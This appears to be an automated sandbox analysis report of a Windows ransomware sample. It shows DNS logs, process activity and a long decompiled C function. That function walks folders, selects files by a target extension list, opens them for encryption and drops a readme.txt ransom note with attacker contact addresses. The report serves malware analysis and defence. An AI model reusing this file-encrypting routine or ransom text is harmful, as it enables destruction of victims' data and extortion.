                                                            Mar 11, 2021 23:56:49.816000938 CET53601528.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:56:50.559340954 CET5754453192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:56:50.610740900 CET53575448.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:56:53.128027916 CET5598453192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:56:53.176733017 CET53559848.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:56:54.006587029 CET6418553192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:56:54.057605028 CET53641858.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:56:54.846864939 CET6511053192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:56:54.897274971 CET53651108.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:56:55.811450005 CET5836153192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:56:55.863310099 CET53583618.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:56:57.309950113 CET6349253192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:56:57.368673086 CET53634928.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:56:58.374007940 CET6083153192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:56:58.431477070 CET53608318.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:56:59.179300070 CET6010053192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:56:59.230304003 CET53601008.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:57:00.180196047 CET5319553192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:57:00.231698990 CET53531958.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:57:00.985135078 CET5014153192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:57:01.036864996 CET53501418.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:57:01.815923929 CET5302353192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:57:01.867480040 CET53530238.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:57:03.174504995 CET4956353192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:57:03.231736898 CET53495638.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:57:03.990144014 CET5135253192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:57:04.042999983 CET53513528.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:57:04.932936907 CET5934953192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:57:04.992894888 CET53593498.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:57:05.727062941 CET5708453192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:57:05.777515888 CET53570848.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:57:06.681126118 CET5882353192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:57:06.729774952 CET53588238.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:57:20.140842915 CET5756853192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:57:20.202352047 CET53575688.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:57:44.901911974 CET5054053192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:57:44.950489044 CET53505408.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:57:46.906498909 CET5436653192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:57:46.960305929 CET53543668.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:58:06.621426105 CET5303453192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:58:06.670023918 CET53530348.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:58:07.338818073 CET5776253192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:58:07.387710094 CET53577628.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:58:29.753804922 CET5543553192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:58:29.802701950 CET53554358.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:58:39.120520115 CET5071353192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:58:39.169346094 CET53507138.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:58:47.667546988 CET5613253192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:58:47.727703094 CET53561328.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:58:48.212227106 CET5898753192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:58:48.263914108 CET53589878.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:58:48.809000969 CET5657953192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:58:48.869199038 CET53565798.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:59:11.992419004 CET6063353192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:59:12.055814028 CET53606338.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:59:28.884892941 CET6129253192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:59:28.943453074 CET53612928.8.8.8192.168.2.3

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                            Mar 11, 2021 23:58:06.670023918 CET8.8.8.8192.168.2.30xd03aNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                            Mar 11, 2021 23:58:48.263914108 CET8.8.8.8192.168.2.30x92c9No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)

                                                            Code Manipulations

                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            Analysis Process: bkscEXd86b.exe PID: 6588 Parent PID: 5708

                                                            General

                                                            Start time:23:56:55
                                                            Start date:11/03/2021
                                                            Path:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:'C:\Users\user\Desktop\bkscEXd86b.exe'
                                                            Imagebase:0xb90000
                                                            File size:1322496 bytes
                                                            MD5 hash:CDDA3913408C4C46A6C575421485FA5B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low

                                                            Chronological Activities

                                                            Analysis Process: conhost.exe PID: 6624 Parent PID: 6588

                                                            General

                                                            Start time:23:56:56
                                                            Start date:11/03/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6b2800000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Chronological Activities

                                                            Analysis Process: WerFault.exe PID: 6792 Parent PID: 1012

                                                            General

                                                            Start time:23:57:01
                                                            Start date:11/03/2021
                                                            Path:C:\Windows\System32\WerFault.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\WerFault.exe -pss -s 568 -p 3388 -ip 3388
                                                            Imagebase:0x7ff69c760000
                                                            File size:494488 bytes
                                                            MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            Chronological Activities

                                                            Analysis Process: explorer.exe PID: 3388 Parent PID: 6792

                                                            General

                                                            Start time:23:57:03
                                                            Start date:11/03/2021
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:
                                                            Imagebase:0x7ff714890000
                                                            File size:3933184 bytes
                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Chronological Activities

                                                            Analysis Process: WerFault.exe PID: 7012 Parent PID: 3388

                                                            General

                                                            Start time:23:57:12
                                                            Start date:11/03/2021
                                                            Path:C:\Windows\System32\WerFault.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\WerFault.exe -u -p 3388 -s 8972
                                                            Imagebase:0x7ff69c760000
                                                            File size:494488 bytes
                                                            MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            Chronological Activities

                                                            Analysis Process: explorer.exe PID: 7120 Parent PID: 560

                                                            General

                                                            Start time:23:57:19
                                                            Start date:11/03/2021
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:explorer.exe
                                                            Imagebase:0x7ff714890000
                                                            File size:3933184 bytes
                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Chronological Activities

                                                            Analysis Process: SearchUI.exe PID: 4888 Parent PID: 792

                                                            General

                                                            Start time:23:57:41
                                                            Start date:11/03/2021
                                                            Path:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                                                            Imagebase:0x7ff632eb0000
                                                            File size:13606304 bytes
                                                            MD5 hash:C4A9ACE9CDB9E5DB7CBA996CFA9EA7A2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            Chronological Activities

                                                            Analysis Process: OpenWith.exe PID: 6724 Parent PID: 792

                                                            General

                                                            Start time:23:58:13
                                                            Start date:11/03/2021
                                                            Path:C:\Windows\System32\OpenWith.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                            Imagebase:0x7ff746c60000
                                                            File size:111120 bytes
                                                            MD5 hash:D179D03728E95E040A889F760C1FC402
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            Chronological Activities

                                                            Analysis Process: SearchUI.exe PID: 1748 Parent PID: 792

                                                            General

                                                            Start time:23:58:44
                                                            Start date:11/03/2021
                                                            Path:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                                                            Imagebase:0x7ff632eb0000
                                                            File size:13606304 bytes
                                                            MD5 hash:C4A9ACE9CDB9E5DB7CBA996CFA9EA7A2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            Chronological Activities

                                                            Disassembly

                                                            Code Analysis

                                                            Reset < >

                                                              Analysis Process: bkscEXd86b.exe PID: 6588 Parent PID: 5708 bkscEXd86b.exeCOMMON

                                                              Executed Functions

                                                              Function 00B91640, Relevance: 46.0, APIs: 16, Strings: 10, Instructions: 455fileCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 78%
                                                              			E00B91640(char** _a4, intOrPtr* _a8, char** _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				long _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v84;
				char _v1388;
				char _v2692;
				char _v3996;
				char _v5299;
				char _v5300;
				struct _WIN32_FIND_DATAA _v5620;
				char _v5621;
				intOrPtr _v5628;
				intOrPtr _v5632;
				char** _v5636;
				void* _v5644;
				intOrPtr* _v5648;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t119;
				signed int _t120;
				intOrPtr* _t126;
				int _t130;
				intOrPtr* _t133;
				char** _t134;
				intOrPtr* _t135;
				signed int _t143;
				intOrPtr* _t144;
				char** _t146;
				char** _t147;
				char** _t152;
				char** _t153;
				intOrPtr* _t154;
				char** _t155;
				char* _t158;
				char** _t159;
				char _t162;
				intOrPtr* _t163;
				char** _t166;
				intOrPtr* _t167;
				intOrPtr* _t169;
				intOrPtr* _t173;
				intOrPtr* _t175;
				intOrPtr* _t178;
				void* _t180;
				intOrPtr* _t181;
				intOrPtr* _t183;
				void* _t187;
				intOrPtr* _t192;
				char _t196;
				intOrPtr* _t197;
				intOrPtr* _t199;
				void* _t202;
				intOrPtr _t206;
				intOrPtr _t212;
				char** _t213;
				char** _t215;
				char** _t216;
				char** _t218;
				char* _t219;
				char* _t220;
				char** _t221;
				char** _t223;
				intOrPtr _t225;
				char** _t226;
				intOrPtr _t227;
				intOrPtr _t228;
				intOrPtr _t229;
				intOrPtr _t231;
				intOrPtr _t232;
				void* _t234;
				void* _t236;
				void* _t237;
				char* _t241;
				void* _t244;
				void* _t245;
				void* _t248;
				void* _t249;
				void* _t251;
				void* _t252;
				void* _t253;
				void* _t254;
				char** _t255;
				signed int _t256;
				char** _t258;
				char** _t259;
				void* _t260;
				void* _t261;
				intOrPtr* _t265;
				void* _t266;
				signed int _t267;
				void* _t268;
				intOrPtr _t269;
				void* _t271;
				void* _t272;
				void* _t275;
				void* _t276;
				void* _t277;
				void* _t278;

				_push(0xfffffffe);
				_push(0xcc0080);
				_push(0xc708a0);
				_push( *[fs:0x0]);
				_t269 = _t268 - 8;
				E00C6BB10(0x15f8);
				_t119 =  *0xcc5970; // 0x851ab4dd
				_v12 = _v12 ^ _t119;
				_t120 = _t119 ^ _t267;
				_v32 = _t120;
				_push(_t201);
				_push(_t251);
				_push(_t120);
				 *[fs:0x0] =  &_v20;
				_v28 = _t269;
				_v5636 = _a4;
				_t265 = _a8;
				_v5648 = _t265;
				_v5628 = _a20;
				_v5632 = _a24;
				_v5620.dwFileAttributes = 0;
				E00C6BB40(_t251,  &(_v5620.ftCreationTime), 0, 0x13c);
				_v5300 = 0;
				E00C6BB40(_t251,  &_v5299, 0, 0x513);
				_t271 = _t269 + 0x18;
				_v5621 = 1;
				_t126 = _t265;
				_t234 = _t126 + 1;
				do {
					_t206 =  *_t126;
					_t126 = _t126 + 1;
				} while (_t206 != 0);
				if( *((char*)(_t265 + _t126 - _t234 - 1)) == 0x5c) {
					L7:
					_push("*.*");
					_push(_t265);
					_push("%s%s");
					_push( &_v5300);
					L8:
					E00C69C35(_t251, _t265);
					_t272 = _t271 + 0x10;
					_t207 =  &_v5620;
					_t235 =  &_v5300;
					_t130 = FindFirstFileA( &_v5300,  &_v5620); // executed
					_v5644 = _t130;
					if(_t130 == 0xffffffff) {
						L86:
						 *[fs:0x0] = _v20;
						_pop(_t252);
						_pop(_t266);
						_pop(_t202);
						return E00C69C26(_t130, _t202, _v32 ^ _t267, _t235, _t252, _t266);
					} else {
						goto L9;
					}
					do {
						L9:
						if((_v5620.dwFileAttributes & 0x00000010) != 0) {
							__eflags = _v5620.cFileName - 0x2e;
							if(_v5620.cFileName == 0x2e) {
								goto L83;
							}
							_t133 = _t265;
							_t237 = _t133 + 1;
							do {
								_t213 =  *_t133;
								_t133 = _t133 + 1;
								__eflags = _t213;
							} while (_t213 != 0);
							_t134 = _t133 - _t237;
							__eflags = _t134;
							_t235 = _t134;
							_t135 =  &(_v5620.cFileName);
							_t75 = _t135 + 1; // 0x2f
							_t254 = _t75;
							do {
								_t207 =  *_t135;
								_t135 = _t135 + 1;
								__eflags = _t207;
							} while (_t207 != 0);
							__eflags = _t135 - _t254 + _t235 - 0x514;
							if(_t135 - _t254 + _t235 >= 0x514) {
								goto L83;
							}
							E00C6BB40(_t254,  &_v3996, 0, 0x514);
							E00C6BB40(_t254,  &_v1388, 0, 0x514);
							_push( &(_v5620.cFileName));
							E00C69C35(_t254, _t265,  &_v3996, "%s%s", _t265);
							_t272 = _t272 + 0x28;
							_t143 = 0;
							do {
								_t215 =  *((intOrPtr*)(_t267 + _t143 - 0xf98));
								 *((char*)(_t267 + _t143 - 0x568)) = _t215;
								_t143 = _t143 + 1;
								__eflags = _t215;
							} while (_t215 != 0);
							_t255 = 0;
							__eflags = 0;
							_t144 =  &_v1388;
							_t235 = _t144 + 1;
							do {
								_t216 =  *_t144;
								_t144 = _t144 + 1;
								__eflags = _t216;
							} while (_t216 != 0);
							__eflags = _t144 == _t235;
							if(_t144 == _t235) {
								L65:
								_t256 = 0;
								__eflags =  *0xec9fb0;
								if( *0xec9fb0 == 0) {
									L71:
									_t258 =  &_v3996 - 1;
									__eflags = _t258;
									do {
										_t146 = _t258[0];
										_t258 =  &(_t258[0]);
										__eflags = _t146;
									} while (_t146 != 0);
									_t207 = "\\"; // 0x5c
									 *_t258 = _t207;
									__eflags = _v5621 - _t146;
									if(_v5621 == _t146) {
										L82:
										_v5621 = 1;
										goto L83;
									}
									_t147 = E00C6A360( &_v1388, "DESKTOP");
									_t275 = _t272 + 8;
									__eflags = _t147;
									if(_t147 == 0) {
										L81:
										_t207 =  &_v3996;
										_t235 = _v5636;
										E00B91640(_v5636,  &_v3996, _a12, _a16, _v5628, _v5632); // executed
										_t272 = _t275 + 0x18;
										goto L82;
									}
									_t152 =  &_v1388 - 1;
									__eflags = _t152;
									do {
										_t218 = _t152[0];
										_t152 =  &(_t152[0]);
										__eflags = _t218;
									} while (_t218 != 0);
									_t219 = "/readme.txt"; // 0x6165722f
									 *_t152 = _t219;
									_t241 = M00CBF7C8; // 0x2e656d64
									_t152[1] = _t241;
									_t220 =  *0xcbf7cc; // 0x747874
									_t152[2] = _t220;
									_t153 = L00C6A96D( &_v1388, "w+"); // executed
									_t275 = _t275 + 8;
									_t259 = _t153;
									__eflags = _t259;
									if(_t259 == 0) {
										goto L81;
									}
									_t154 = 0xdc9fb0;
									do {
										_t221 =  *_t154;
										_t154 = _t154 + 1;
										__eflags = _t221;
									} while (_t221 != 0);
									_t155 = _t154 - 0xdc9fb1;
									__eflags = _t155;
									_push(_t259);
									_push(_t155);
									_push(1);
									_push("Your file has been encrypted!						 If you want to decrypt, please contact us.						 konedieyp@airmail.cc or uenwonken@memail.com						 And please send me the following hash!						 d37fc1eabc6783a418d23a8d2ba5db5a");
									E00C6ADA3(_t201, 0xdc9fb1, _t259, _t265, __eflags);
									_push(_t259); // executed
									E00C6B1A7(_t201, 0xdc9fb1, _t259, _t265, __eflags); // executed
									_t275 = _t275 + 0x14;
									goto L81;
								}
								_t158 = 0xec9fb0;
								while(1) {
									_t235 =  &_v1388;
									_t159 = E00C6A360( &_v1388, _t158);
									_t272 = _t272 + 8;
									__eflags = _t159;
									if(_t159 != 0) {
										break;
									}
									_t256 = _t256 + 1;
									_t158 = 0xec9fb0 + _t256 * 0xff;
									__eflags =  *_t158;
									if( *_t158 != 0) {
										continue;
									}
									goto L71;
								}
								_v5621 = 0;
								goto L71;
							}
							do {
								_t162 = E00C6AFFA( *((char*)(_t267 + _t255 - 0x568)));
								_t272 = _t272 + 4;
								 *((char*)(_t267 + _t255 - 0x568)) = _t162;
								_t255 =  &(_t255[0]);
								__eflags = _t255;
								_t163 =  &_v1388;
								_t235 = _t163 + 1;
								do {
									_t223 =  *_t163;
									_t163 = _t163 + 1;
									__eflags = _t223;
								} while (_t223 != 0);
								__eflags = _t255 - _t163 - _t235;
							} while (_t255 < _t163 - _t235);
							goto L65;
						}
						_t166 = E00C6AE30(_t207,  &(_v5620.cFileName), 0x2e);
						_t272 = _t272 + 8;
						_t201 = _t166;
						if(_t201 == 0) {
							goto L83;
						}
						_t167 = _t265;
						_t236 = _t167 + 1;
						do {
							_t212 =  *_t167;
							_t167 = _t167 + 1;
						} while (_t212 != 0);
						_t235 = _t167 - _t236;
						_t169 =  &(_v5620.cFileName);
						_t260 = _t169 + 1;
						do {
							_t207 =  *_t169;
							_t169 = _t169 + 1;
						} while (_t207 != 0);
						if(_t169 - _t260 + _t235 >= 0x514) {
							goto L83;
						}
						E00C6BB40(_t260,  &_v84, 0, 0x32);
						_t276 = _t272 + 0xc;
						_t173 = _t201;
						_t38 = _t173 + 1; // 0x1
						_t244 = _t38;
						do {
							_t225 =  *_t173;
							_t173 = _t173 + 1;
						} while (_t225 != 0);
						if(_t173 - _t244 <= 0x32) {
							_t175 = _t201;
							_t39 = _t175 + 1; // 0x1
							_t245 = _t39;
							do {
								_t226 =  *_t175;
								_t175 = _t175 + 1;
								__eflags = _t226;
							} while (_t226 != 0);
							_t176 = _t175 - _t245;
							__eflags = _t175 - _t245;
							L23:
							E00C6A6C0( &_v84, _t201, _t176);
							_t277 = _t276 + 0xc;
							_t261 = 0;
							_t178 =  &_v84;
							_t235 = _t178 + 1;
							do {
								_t227 =  *_t178;
								_t178 = _t178 + 1;
							} while (_t227 != 0);
							if(_t178 == _t235) {
								L30:
								_t207 =  &_v84;
								_t180 = E00C6A360(".TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML  .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG.CSV .DAT .ISO .PST .PGD  .7Z .RAR .ZIP .ZIPX .TAR .PDB .BIN .DB .MDB .MDF .BAK .LOG .EDB .STM .DBF .ORA",  &_v84);
								_t272 = _t277 + 8;
								if(_t180 == 0) {
									goto L83;
								}
								_t207 = "readme.txt";
								_t181 =  &(_v5620.cFileName);
								while(1) {
									_t235 =  *_t181;
									if(_t235 !=  *_t207) {
										break;
									}
									if(_t235 == 0) {
										L36:
										_t181 = 0;
										L38:
										if(_t181 == 0) {
											goto L83;
										}
										E00C6BB40(_t261,  &_v2692, 0, 0x514);
										_t278 = _t272 + 0xc;
										_t183 = _t265;
										_t248 = _t183 + 1;
										do {
											_t228 =  *_t183;
											_t183 = _t183 + 1;
										} while (_t228 != 0);
										if( *((char*)(_t183 - _t248 + _t265 - 1)) == 0x5c) {
											L46:
											_t235 =  &(_v5620.cFileName);
											_push( &(_v5620.cFileName));
											_push(_t265);
											_push("%s%s");
											_push( &_v2692);
											L47:
											E00C69C35(_t261, _t265);
											_v8 = 0;
											_t207 =  &_v2692;
											_t187 = L00C6A96D( &_v2692, "rb+"); // executed
											_t272 = _t278 + 0x18;
											_t313 = _t187;
											if(_t187 != 0) {
												_push(_t187); // executed
												E00C6B1A7(_t201, _t235, _t261, _t265, _t313); // executed
												_t262 = _v5628;
												E00C6BB40(_v5628, _v5628, 0, 0x100000);
												E00C6BB40(_v5628, _v5632, 0, 0x100000);
												_t235 = _a12;
												_t201 = _v5636;
												E00B915D0(_v5636,  &_v2692, _a12, _t262, _v5632);
												_t272 = _t272 + 0x28;
											}
											_v8 = 0xfffffffe;
											goto L83;
										}
										_t192 = _t265;
										_t235 = _t192 + 1;
										do {
											_t229 =  *_t192;
											_t192 = _t192 + 1;
										} while (_t229 != 0);
										if( *((char*)(_t192 - _t235 + _t265 - 1)) == 0x2f) {
											goto L46;
										}
										_push( &(_v5620.cFileName));
										_push(_t265);
										_push("%s\\%s");
										_push( &_v2692);
										goto L47;
									}
									_t235 =  *((intOrPtr*)(_t181 + 1));
									if(_t235 != _t207[1]) {
										break;
									}
									_t181 = _t181 + 2;
									_t207 =  &(_t207[2]);
									if(_t235 != 0) {
										continue;
									}
									goto L36;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L38;
							}
							do {
								_t196 = E00C6AFFA( *((char*)(_t267 + _t261 - 0x50)));
								_t277 = _t277 + 4;
								 *((char*)(_t267 + _t261 - 0x50)) = _t196;
								_t261 = _t261 + 1;
								_t197 =  &_v84;
								_t235 = _t197 + 1;
								do {
									_t231 =  *_t197;
									_t197 = _t197 + 1;
								} while (_t231 != 0);
							} while (_t261 < _t197 - _t235);
							goto L30;
						}
						_t176 = 0x32;
						goto L23;
						L83:
						_t253 = _v5644;
						_t130 = FindNextFileA(_t253,  &_v5620); // executed
					} while (_t130 != 0);
					if(_t253 != 0xffffffff) {
						_t130 = FindClose(_t253); // executed
					}
					goto L86;
				}
				_t199 = _t265;
				_t249 = _t199 + 1;
				do {
					_t232 =  *_t199;
					_t199 = _t199 + 1;
				} while (_t232 != 0);
				if( *((char*)(_t265 + _t199 - _t249 - 1)) == 0x2f) {
					goto L7;
				}
				_push("*.*");
				_push(_t265);
				_push("%s\\%s");
				_push( &_v5300);
				goto L8;
			}









































































































                                                              0x00b91643
                                                              0x00b91645
                                                              0x00b9164a
                                                              0x00b91655
                                                              0x00b91656
                                                              0x00b9165e
                                                              0x00b91663
                                                              0x00b91668
                                                              0x00b9166b
                                                              0x00b9166d
                                                              0x00b91670
                                                              0x00b91672
                                                              0x00b91673
                                                              0x00b91677
                                                              0x00b9167d
                                                              0x00b91683
                                                              0x00b91689
                                                              0x00b9168c
                                                              0x00b91695
                                                              0x00b9169e
                                                              0x00b916a4
                                                              0x00b916bc
                                                              0x00b916c4
                                                              0x00b916d9
                                                              0x00b916de
                                                              0x00b916e1
                                                              0x00b916e8
                                                              0x00b916ea
                                                              0x00b916f0
                                                              0x00b916f0
                                                              0x00b916f2
                                                              0x00b916f3
                                                              0x00b916fe
                                                              0x00b91729
                                                              0x00b91729
                                                              0x00b9172e
                                                              0x00b9172f
                                                              0x00b9173a
                                                              0x00b9173b
                                                              0x00b9173b
                                                              0x00b91740
                                                              0x00b91743
                                                              0x00b9174a
                                                              0x00b91751
                                                              0x00b91757
                                                              0x00b91760
                                                              0x00b91beb
                                                              0x00b91bee
                                                              0x00b91bf6
                                                              0x00b91bf7
                                                              0x00b91bf8
                                                              0x00b91c06
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91766
                                                              0x00b91766
                                                              0x00b9176d
                                                              0x00b919ac
                                                              0x00b919b3
                                                              0x00000000
                                                              0x00000000
                                                              0x00b919b9
                                                              0x00b919bb
                                                              0x00b919c0
                                                              0x00b919c0
                                                              0x00b919c2
                                                              0x00b919c3
                                                              0x00b919c3
                                                              0x00b919c7
                                                              0x00b919c7
                                                              0x00b919c9
                                                              0x00b919cb
                                                              0x00b919d1
                                                              0x00b919d1
                                                              0x00b919d4
                                                              0x00b919d4
                                                              0x00b919d6
                                                              0x00b919d7
                                                              0x00b919d7
                                                              0x00b919df
                                                              0x00b919e4
                                                              0x00000000
                                                              0x00000000
                                                              0x00b919f8
                                                              0x00b91a0e
                                                              0x00b91a1c
                                                              0x00b91a2a
                                                              0x00b91a2f
                                                              0x00b91a32
                                                              0x00b91a40
                                                              0x00b91a40
                                                              0x00b91a47
                                                              0x00b91a4e
                                                              0x00b91a4f
                                                              0x00b91a4f
                                                              0x00b91a53
                                                              0x00b91a53
                                                              0x00b91a55
                                                              0x00b91a5b
                                                              0x00b91a60
                                                              0x00b91a60
                                                              0x00b91a62
                                                              0x00b91a63
                                                              0x00b91a63
                                                              0x00b91a67
                                                              0x00b91a69
                                                              0x00b91a9f
                                                              0x00b91a9f
                                                              0x00b91aa1
                                                              0x00b91aa8
                                                              0x00b91ae1
                                                              0x00b91ae7
                                                              0x00b91ae7
                                                              0x00b91ae8
                                                              0x00b91ae8
                                                              0x00b91aeb
                                                              0x00b91aec
                                                              0x00b91aec
                                                              0x00b91af0
                                                              0x00b91af7
                                                              0x00b91afa
                                                              0x00b91b00
                                                              0x00b91bbc
                                                              0x00b91bbc
                                                              0x00000000
                                                              0x00b91bbc
                                                              0x00b91b12
                                                              0x00b91b17
                                                              0x00b91b1a
                                                              0x00b91b1c
                                                              0x00b91b90
                                                              0x00b91ba6
                                                              0x00b91bad
                                                              0x00b91bb4
                                                              0x00b91bb9
                                                              0x00000000
                                                              0x00b91bb9
                                                              0x00b91b24
                                                              0x00b91b24
                                                              0x00b91b25
                                                              0x00b91b25
                                                              0x00b91b28
                                                              0x00b91b29
                                                              0x00b91b29
                                                              0x00b91b2d
                                                              0x00b91b33
                                                              0x00b91b35
                                                              0x00b91b3b
                                                              0x00b91b3e
                                                              0x00b91b44
                                                              0x00b91b53
                                                              0x00b91b58
                                                              0x00b91b5b
                                                              0x00b91b5d
                                                              0x00b91b5f
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91b61
                                                              0x00b91b70
                                                              0x00b91b70
                                                              0x00b91b72
                                                              0x00b91b73
                                                              0x00b91b73
                                                              0x00b91b77
                                                              0x00b91b77
                                                              0x00b91b79
                                                              0x00b91b7a
                                                              0x00b91b7b
                                                              0x00b91b7d
                                                              0x00b91b82
                                                              0x00b91b87
                                                              0x00b91b88
                                                              0x00b91b8d
                                                              0x00000000
                                                              0x00b91b8d
                                                              0x00b91aaa
                                                              0x00b91ab0
                                                              0x00b91ab1
                                                              0x00b91ab8
                                                              0x00b91abd
                                                              0x00b91ac0
                                                              0x00b91ac2
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91ac4
                                                              0x00b91acd
                                                              0x00b91ad3
                                                              0x00b91ad6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91ad8
                                                              0x00b91ada
                                                              0x00000000
                                                              0x00b91ada
                                                              0x00b91a70
                                                              0x00b91a79
                                                              0x00b91a7e
                                                              0x00b91a81
                                                              0x00b91a88
                                                              0x00b91a88
                                                              0x00b91a89
                                                              0x00b91a8f
                                                              0x00b91a92
                                                              0x00b91a92
                                                              0x00b91a94
                                                              0x00b91a95
                                                              0x00b91a95
